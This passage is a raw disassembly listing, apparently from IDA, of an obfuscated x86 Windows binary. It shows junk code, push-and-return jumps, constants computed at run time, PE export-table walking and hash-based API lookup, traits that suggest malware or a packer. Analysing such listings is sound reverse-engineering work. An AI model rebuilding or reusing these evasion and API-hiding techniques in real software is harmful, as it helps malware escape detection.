call sub_432300
jo loc_42E909
mov edx, 0A2CD59D9h
call sub_42EC54
jmp loc_42FD5B
; ---------------------------------------------------------------------------
loc_430B08: ; CODE XREF: j8.b78ws:00430AD1�j
jp loc_42E6AE
; =============== S U B R O U T I N E =======================================
sub_430B0E proc near ; CODE XREF: sub_42EC9C:loc_42E94F�p
xchg eax, [esp+0]
pop eax
or ecx, ecx
jz loc_430B22
mov ebx, [ebx+ecx]
call sub_42FFCD
sub_430B0E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_430B22: ; CODE XREF: sub_4315A4-18AD�j
; sub_4315A4:loc_42FE55�j ...
jnb loc_432551
jmp loc_432490
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_430B2D: ; CODE XREF: sub_42ED88:loc_431F28�j
cmp byte ptr [eax], 0E8h
jnz loc_431149
mov eax, [ebp-4]
loc_430B39: ; CODE XREF: sub_43119E:loc_430E90�j
inc eax
mov eax, [eax]
add eax, [ebp-4]
add eax, 5
jmp loc_43103D
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313E5
loc_430B47: ; CODE XREF: sub_4313E5+824�j
dec dword ptr [ebp-24h]
jnz loc_430E16
jmp loc_43000F
; END OF FUNCTION CHUNK FOR sub_4313E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_430B55: ; CODE XREF: sub_430BA0+4�j
ror eax, 10h
push eax
retn
; END OF FUNCTION CHUNK FOR sub_430BA0
; ---------------------------------------------------------------------------
loc_430B5A: ; CODE XREF: j8.b78ws:00432230�j
jmp locret_430D5E
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430B64 proc near ; CODE XREF: sub_431F8C+3�p
; FUNCTION CHUNK AT 0042FAAB SIZE 00000005 BYTES
push ebp
mov ebp, esp
push eax
jmp loc_42FAAB
sub_430B64 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430B6D: ; CODE XREF: sub_43119E+91�j
or eax, edx
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_430B6F proc near ; CODE XREF: sub_42ED04+9�p
; FUNCTION CHUNK AT 0043064E SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
mov [ebp-20h], eax
jmp loc_43064E
sub_430B6F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_430B7B: ; CODE XREF: sub_4301B9:loc_430DF4�j
call sub_431AD9
loc_430B80: ; DATA XREF: sub_4320D1:loc_430440�o
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_43257C
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320D1
loc_430B97: ; CODE XREF: sub_4320D1-171C�j
cmp dword ptr [ebp-10h], 2
jmp loc_4303E7
; END OF FUNCTION CHUNK FOR sub_4320D1
; =============== S U B R O U T I N E =======================================
sub_430BA0 proc near ; DATA XREF: sub_42F893:loc_42FC27�o
; FUNCTION CHUNK AT 0042E5B7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042EF2F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F91C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042FF51 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00430312 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430B55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004314F2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00432411 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004326DE SIZE 00000001 BYTES
mov eax, [eax]
or eax, eax
jnz loc_430B55
jmp loc_430312
sub_430BA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430BAF: ; CODE XREF: sub_43119E+E07�j
jbe loc_43070B
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_430BB5 proc near ; CODE XREF: sub_4302AC-7D8�p
; FUNCTION CHUNK AT 00431C0E SIZE 0000000A BYTES
mov [esp+0], edx
pop edx
call sub_42EC54
mov ds:dword_42E0A4, eax
loc_430BC3: ; CODE XREF: sub_4302AC:loc_42FABF�j
mov eax, ds:dword_42E0A4
call sub_4302E0
jmp loc_431C0E
sub_430BB5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43082D
loc_430BD2: ; CODE XREF: sub_43082D-23E6�j
; sub_43082D+E46�j
mov eax, ds:dword_42E06C
mov al, [eax]
sub al, 99h
mov edx, ds:dword_42E06C
imul byte ptr [edx]
jmp loc_42ED12
; END OF FUNCTION CHUNK FOR sub_43082D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_430BE8: ; CODE XREF: sub_430C91-1150�j
xchg ebp, edx
loc_430BEA: ; CODE XREF: sub_430C91:loc_42FF3C�j
push 0B313DD31h
pop eax
or eax, 8B2DF029h
cmp eax, 0A095AE8Ah
jmp loc_43159A
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
push eax
call sub_42EB5A
pop eax
push 0F2146FE8h
jmp loc_42EF1F
; =============== S U B R O U T I N E =======================================
sub_430C12 proc near ; CODE XREF: sub_4306C9-1FA1�p
; sub_42FCBF-141E�j ...
; FUNCTION CHUNK AT 0042E27D SIZE 0000000A BYTES
mov edx, 1
lock xchg edx, [eax]
or edx, edx
call sub_432806
loc_430C21: ; CODE XREF: sub_431AB0-71F�j
jmp loc_42E27D
sub_430C12 endp
; ---------------------------------------------------------------------------
loc_430C26: ; CODE XREF: j8.b78ws:00431BE0�j
jg loc_430A1A
; =============== S U B R O U T I N E =======================================
sub_430C2C proc near ; CODE XREF: sub_42EBA9+312B�p
; FUNCTION CHUNK AT 0042FEE9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004301C9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00430911 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431D6E SIZE 0000000A BYTES
xchg esi, [esp+0]
pop esi
mov [ebp-8], eax
loc_430C33: ; CODE XREF: sub_42EBA9:loc_42E061�j
; sub_42EBA9+68�j ...
call sub_42E29B
mov [ebp-0Ah], al
loc_430C3B: ; CODE XREF: sub_42E487:loc_42FFC7�j
js loc_431D6E
mov eax, [ebp-4]
jmp loc_430911
sub_430C2C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430C49: ; CODE XREF: sub_43119E:loc_431298�j
; DATA XREF: sub_43119E+F0�o
add [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Ah
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_430E78
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431444
loc_430C5D: ; CODE XREF: sub_431444:loc_4325D5�j
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
mov eax, [eax+60h]
; END OF FUNCTION CHUNK FOR sub_431444
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430C71: ; CODE XREF: sub_43119E:loc_43053C�j
add eax, [ebp-4]
jmp loc_42EF2A
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431729
loc_430C79: ; CODE XREF: sub_431729:loc_431508�j
add edx, 721A40Ch
mov [edx], eax
pop edx
; END OF FUNCTION CHUNK FOR sub_431729
; START OF FUNCTION CHUNK FOR sub_4322BE
loc_430C82: ; CODE XREF: j8.b78ws:0042E4E6�j
; sub_4322BE-3D4F�j ...
dec ds:dword_43129C
mov eax, [ebp-4]
pop ecx
jmp loc_42E601
; END OF FUNCTION CHUNK FOR sub_4322BE
; =============== S U B R O U T I N E =======================================
sub_430C91 proc near ; CODE XREF: j8.b78ws:0043147B�j
; sub_42E3FA:loc_432476�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042E528 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EE51 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042F757 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F9BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FA76 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042FB3F SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042FD49 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042FDD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FF3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FFBC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004301A7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00430479 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004304B6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004306A8 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00430BE8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00430EDD SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00430F1C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043113E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043159A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431C41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043214D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004321DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043231A SIZE 0000000E BYTES
xchg edx, [esp+0]
pop edx
cmp dword ptr [ebp-1Ch], 0Fh
jnz loc_431CF5
mov eax, [ebp-1Ch]
shl eax, 8
jmp loc_42FDD4
sub_430C91 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430790
loc_430CAA: ; CODE XREF: sub_430790-87A�j
add dword ptr [ebp-8], 2
jmp loc_432175
; END OF FUNCTION CHUNK FOR sub_430790
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430CB3 proc near ; CODE XREF: sub_42ED04+3�p sub_430180�p
; FUNCTION CHUNK AT 0042E7C2 SIZE 00000006 BYTES
push ebp
mov ebp, esp
call sub_430110
loc_430CBB: ; CODE XREF: j8.b78ws:0042E22B�j
jmp loc_42E7C2
sub_430CB3 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_430CC1: ; CODE XREF: sub_42ED88+36B4�j
jmp loc_4316FF
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430CC6: ; CODE XREF: sub_43119E-6B�j
jmp loc_42E98F
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_430CCB: ; DATA XREF: sub_430CE7+10�o
push 28h
push offset loc_431E56
jmp locret_430E4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_430CD7: ; CODE XREF: sub_42FFCD:loc_42EEF1�j
; sub_42FFCD+933�j
call sub_42ECB4
loc_430CDC: ; CODE XREF: sub_42FE94+3�j
jmp loc_432720
; END OF FUNCTION CHUNK FOR sub_42FFCD
; ---------------------------------------------------------------------------
pop esi
jmp sub_431A47
; =============== S U B R O U T I N E =======================================
sub_430CE7 proc near ; CODE XREF: sub_42FB98+BE3�p
; j8.b78ws:00431563�j
xchg edx, [esp+0]
pop edx
push 0F561D2EAh
add dword ptr [esp+0], 0A9E2D1Ah
push offset loc_430CCB
jmp j_nullsub_47
sub_430CE7 endp
; ---------------------------------------------------------------------------
and esi, 745A91FCh
cmp edi, eax
jmp loc_42ED3A
; ---------------------------------------------------------------------------
loc_430D0E: ; DATA XREF: sub_42ED88-D5B�o
jb loc_430DDF
mov eax, [ebp-10h]
push offset loc_4321CF
jmp loc_42E904
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_430D21: ; CODE XREF: sub_4321C5:loc_42F867�j
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jnz loc_430777
jmp loc_42E3F5
; END OF FUNCTION CHUNK FOR sub_4321C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_430D32: ; CODE XREF: sub_42E9AD+1F8D�j
jnz loc_4305B4
jmp loc_431A3A
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
xor ebx, 0E3569B7Fh
push ecx
jmp sub_43145D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430F88
loc_430D49: ; CODE XREF: sub_430F88+4�j
ror eax, 0Eh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_430F88
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430D53 proc near ; CODE XREF: sub_43119E-E17�j
jmp locret_42E7C7
sub_430D53 endp
; =============== S U B R O U T I N E =======================================
sub_430D58 proc near ; CODE XREF: sub_42E699+6�p
; FUNCTION CHUNK AT 0043035A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00431840 SIZE 00000005 BYTES
push ebp
jmp loc_431840
sub_430D58 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_430D5E: ; CODE XREF: j8.b78ws:loc_430B5A�j
retn
; =============== S U B R O U T I N E =======================================
sub_430D5F proc near ; CODE XREF: sub_4308C3+14�p
; sub_430D9F+4�p
jb sub_42FA63
call sub_4316AB
sub_430D5F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_430D6A proc near ; CODE XREF: j8.b78ws:0042E28D�j
; sub_430223+1ACD�p
mov [esp+0], esi
pop esi
shr eax, 6
mov [ebp-10h], eax
mov eax, [ebp+8]
mov eax, [eax-10h]
push offset loc_431ECB
jmp locret_4311CD
sub_430D6A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FB98
loc_430D84: ; CODE XREF: j8.b78ws:loc_42FFB6�j
; sub_430C91-AE3�j ...
mov esp, ebp
push offset sub_4321A1
jmp sub_431D13
; END OF FUNCTION CHUNK FOR sub_42FB98
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1B3
loc_430D90: ; CODE XREF: sub_42E1B3+2549�j
mov edx, 0F75CA70h
push offset loc_42F7A2
jmp nullsub_26
; END OF FUNCTION CHUNK FOR sub_42E1B3
; =============== S U B R O U T I N E =======================================
sub_430D9F proc near ; CODE XREF: j8.b78ws:004309C7�j
; sub_4316AB+7AF�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00431EFE SIZE 00000013 BYTES
xchg edi, [esp+0]
pop edi
call sub_430D5F
mov eax, [ebp-4]
and dword ptr [eax+24h], 7FFFFFFFh
jmp loc_431EFE
sub_430D9F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [eax], ebp
and esi, edi
jmp sub_432328
; ---------------------------------------------------------------------------
loc_430DC0: ; DATA XREF: sub_43119E+F6A�o
add eax, edx
pop edx
mov ebp, [eax]
push offset sub_431836
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_76. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_430DCF proc near ; CODE XREF: j8.b78ws:0042E0F4�j
; sub_4321C5+D�p
; FUNCTION CHUNK AT 0042E7DC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004302C2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004310CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432856 SIZE 00000006 BYTES
xchg edi, [esp+0]
pop edi
add eax, [ebp-14h]
cmp eax, [ebp-0Ch]
ja loc_42E7DC
loc_430DDF: ; CODE XREF: j8.b78ws:loc_430D0E�j
cmp dword ptr [ebp-8], 0A22F8A70h
jz loc_4302CA
jmp loc_4310CC
sub_430DCF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43267C
loc_430DF1: ; CODE XREF: sub_43267C:loc_430071�j
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_43267C
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_430DF4: ; CODE XREF: sub_4301B9+4�j
; sub_430361:loc_430375�j ...
jnb loc_430B7B
test byte ptr [ebp-7], 8
call sub_42E10C
loc_430E03: ; CODE XREF: sub_43119E+1446�j
test eax, eax
jl loc_4302CA
inc eax
mov [ebp-24h], eax
mov dword ptr [ebp-18h], 0
loc_430E16: ; CODE XREF: sub_4313E5-89B�j
mov eax, [ebp-14h]
jmp loc_432071
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431908
loc_430E1E: ; CODE XREF: sub_431908+1A�j
lea edx, [ebp-14h]
mov eax, offset dword_42E084
call sub_42EBA9
lea eax, [ebp-14h]
jmp loc_431BE5
; END OF FUNCTION CHUNK FOR sub_431908
; ---------------------------------------------------------------------------
pop eax
jmp loc_430752
; ---------------------------------------------------------------------------
loc_430E39: ; CODE XREF: j8.b78ws:loc_42FFC2�j
push ecx
push 529DF4CCh
pop ecx
add ecx, 0AD620B34h
xchg ecx, [esp]
jmp loc_42ED35
; ---------------------------------------------------------------------------
locret_430E4E: ; CODE XREF: j8.b78ws:00430CD2�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430790
loc_430E4F: ; CODE XREF: sub_430790+A�j
jmp loc_432162
; END OF FUNCTION CHUNK FOR sub_430790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_430E54: ; CODE XREF: sub_42FFCD-12F1�j
jmp loc_42EEF1
; END OF FUNCTION CHUNK FOR sub_42FFCD
; ---------------------------------------------------------------------------
loc_430E59: ; CODE XREF: j8.b78ws:loc_42E075�j
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430E5B: ; CODE XREF: sub_43119E+114A�j
jmp loc_4320F3
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431651
loc_430E60: ; CODE XREF: sub_431651+C�j
jmp loc_42F792
; END OF FUNCTION CHUNK FOR sub_431651
; =============== S U B R O U T I N E =======================================
sub_430E65 proc near ; CODE XREF: sub_43237F-2810�p
; sub_4304C6+B�p ...
jns sub_432786
push ebp
mov ebp, esp
call sub_4326DF
loc_430E73: ; CODE XREF: sub_4306C9-EE0�j
jmp nullsub_27
sub_430E65 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430E78: ; CODE XREF: sub_43119E-546�j
shr eax, 6
xor [ebp-8], eax
push offset sub_4325E9
jmp nullsub_31
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_430E88 proc near ; DATA XREF: sub_42EBA9+3E�o
call edx ; GetModuleHandleA
pop ebp
call sub_431F41
sub_430E88 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430E90: ; CODE XREF: sub_43119E+137E�j
jmp loc_430B39
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430E95 proc near ; CODE XREF: sub_431640-1C93�j
jmp sub_4321A8
sub_430E95 endp
; ---------------------------------------------------------------------------
loc_430E9A: ; CODE XREF: j8.b78ws:00430130�j
test eax, 0BF695036h
jmp loc_431624
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_430EA6: ; CODE XREF: j8.b78ws:0042ECFF�j
jo loc_42FA45
; =============== S U B R O U T I N E =======================================
sub_430EAC proc near ; CODE XREF: sub_430662+A19�p
; FUNCTION CHUNK AT 0043057E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043061D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043099D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004309DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430A48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431112 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431E21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432036 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004324EF SIZE 00000002 BYTES
xchg edx, [esp+0]
pop edx
push 74B7FCDAh
pop eax
rol eax, 2
add eax, 2D6328E3h
mov eax, [eax]
jmp loc_43057E
sub_430EAC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_430EC6: ; DATA XREF: sub_4306C9-EE5�o
mov [ebp-4], eax
mov eax, offset dword_42E07C
call sub_432416
mov eax, [ebp-4]
mov esp, ebp
jmp loc_43240F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_430EDD: ; CODE XREF: sub_430C91-80C�j
or edi, 452A6DC8h
add ebx, 0EBB26AB6h
loc_430EE9: ; CODE XREF: sub_430C91:loc_430479�j
xor eax, 0ACB86DBEh
add eax, ebp
jmp loc_43214D
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43285C
loc_430EF6: ; CODE XREF: sub_43285C:loc_431C3C�j
mov [ebp-20h], eax
jmp loc_432031
; END OF FUNCTION CHUNK FOR sub_43285C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E487
loc_430EFE: ; CODE XREF: sub_42E487:loc_431AF3�j
call sub_42E9C6
loc_430F03: ; CODE XREF: sub_431A7B+1E�j
jmp loc_432560
; END OF FUNCTION CHUNK FOR sub_42E487
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBA9
loc_430F08: ; CODE XREF: sub_42EBA9:loc_431CD9�j
pop esi
mov eax, [eax]
call sub_432096
loc_430F10: ; CODE XREF: sub_42FED3+283D�j
jmp loc_432768
; END OF FUNCTION CHUNK FOR sub_42EBA9
; ---------------------------------------------------------------------------
db 89h, 1Ah, 0E9h
dd 0FFFFE84Eh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_430F1C: ; CODE XREF: sub_430C91+1692�j
jns loc_4302FE
loc_430F22: ; CODE XREF: sub_430C91:loc_4321DC�j
mov eax, [ebp-4]
xor edx, edx
push edx
push eax
mov eax, [ebp-4]
mov eax, [eax+3Ch]
loc_430F2F: ; CODE XREF: j8.b78ws:00431B5F�j
cdq
jmp loc_431C41
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
loc_430F35: ; CODE XREF: j8.b78ws:00431DB9�j
xchg ecx, [edx]
xchg eax, ebp
test esi, 0D8B55B93h
jmp loc_4311A3
; ---------------------------------------------------------------------------
loc_430F44: ; DATA XREF: sub_4301B9-12A4�o
cmp dword ptr [ebp-0Ch], 5
jnz loc_430F55
mov eax, [ebp+8]
or dword ptr [eax-8], 8
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430F55: ; CODE XREF: sub_4301B9-12AA�j
; sub_4301B9:loc_43079F�j ...
jns loc_42EDC2
jmp loc_42FD6A
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_430F60: ; CODE XREF: j8.b78ws:0043021E�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
setz al
jmp loc_42F87C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430F72: ; CODE XREF: sub_43119E:loc_42EDE2�j
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_42E997
mov eax, [ebp+8]
push eax
jmp loc_42FE21
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_430F88 proc near ; DATA XREF: sub_43080D+C�o
; FUNCTION CHUNK AT 00430D49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431080 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004314E7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004318F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00432375 SIZE 00000005 BYTES
mov eax, [eax]
or eax, eax
jnz loc_430D49
jmp loc_431080
sub_430F88 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430F9D proc near ; CODE XREF: sub_42E381+3644�j
jmp sub_43230A
sub_430F9D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_430FA3: ; CODE XREF: j8.b78ws:0043235C�j
jmp loc_430F55
; ---------------------------------------------------------------------------
adc esi, 5AF97D7Ch
jmp sub_42FDD9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_430FB4 proc near ; DATA XREF: sub_431DA0-530�o
mov edi, [eax]
push ebx
push 674B012Ah
shr ebx, 9
jmp loc_4311D3
sub_430FB4 endp
; ---------------------------------------------------------------------------
loc_430FC4: ; DATA XREF: sub_42FC8B-379�o
push 0FFFFFFFFh
push ebx
push 0C554D36Dh
pop ebx
add ebx, 0C258A6A8h
xor ebx, 87AD7A15h
jmp loc_42EA3D
; ---------------------------------------------------------------------------
loc_430FDE: ; CODE XREF: j8.b78ws:loc_42FA5E�j
jnz loc_42FE06
jmp loc_42FBCE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_430FE9: ; CODE XREF: j8.b78ws:0042E287�j
; sub_4314D8:loc_42EEC9�j
pop eax
rol eax, 11h
and eax, 0F02D6826h
xor eax, 90054C26h
call sub_42E584
mov [ebp-8], eax
push 400h
mov eax, [ebp-8]
push offset loc_42FF2B
jmp j_nullsub_69
; END OF FUNCTION CHUNK FOR sub_4314D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430A75
loc_431013: ; CODE XREF: sub_430A75:loc_42FB10�j
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
loc_43101A: ; CODE XREF: sub_4307EC+B�j
cmp edx, 7C61090Eh
jz loc_42FE35
; END OF FUNCTION CHUNK FOR sub_430A75
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_431026: ; CODE XREF: sub_4307FC-5B5�j
; j8.b78ws:00431999�j ...
js loc_43282B
jmp loc_42FE3F
; END OF FUNCTION CHUNK FOR sub_4307FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43217F
loc_431031: ; CODE XREF: sub_43217F+1D�j
mov ds:dword_42E098, eax
retn
; END OF FUNCTION CHUNK FOR sub_43217F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315E4
loc_431038: ; CODE XREF: sub_4315E4-474�j
jmp loc_430AAC
; END OF FUNCTION CHUNK FOR sub_4315E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_43103D: ; CODE XREF: sub_42ED88+1DBA�j
jmp loc_431D45
; END OF FUNCTION CHUNK FOR sub_42ED88
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431042 proc near ; CODE XREF: sub_42E8A6�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042E35F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042FF02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043277A SIZE 0000000C BYTES
push ebp
mov ebp, esp
mov esp, ebp
pop ebp
jmp loc_42FF02
sub_431042 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_43104D: ; CODE XREF: sub_4301B9+23C9�j
cmp dword ptr [ebp-14h], 4
push offset sub_431085
jmp sub_42E0EE
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43157B
loc_43105B: ; CODE XREF: sub_43157B+13�j
lea edx, [ebp+var_14]
mov eax, offset dword_42F760
call sub_42EBA9
push offset loc_43040B
jmp j_nullsub_71
; END OF FUNCTION CHUNK FOR sub_43157B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430662
loc_431072: ; CODE XREF: sub_430662:loc_4304E6�j
mov ebp, esp
push edi
mov [esp+8+var_8], ecx
mov esp, ebp
pop ebp
call sub_430EAC
; END OF FUNCTION CHUNK FOR sub_430662
; START OF FUNCTION CHUNK FOR sub_430F88
loc_431080: ; CODE XREF: sub_430F88+A�j
jmp loc_4318F2
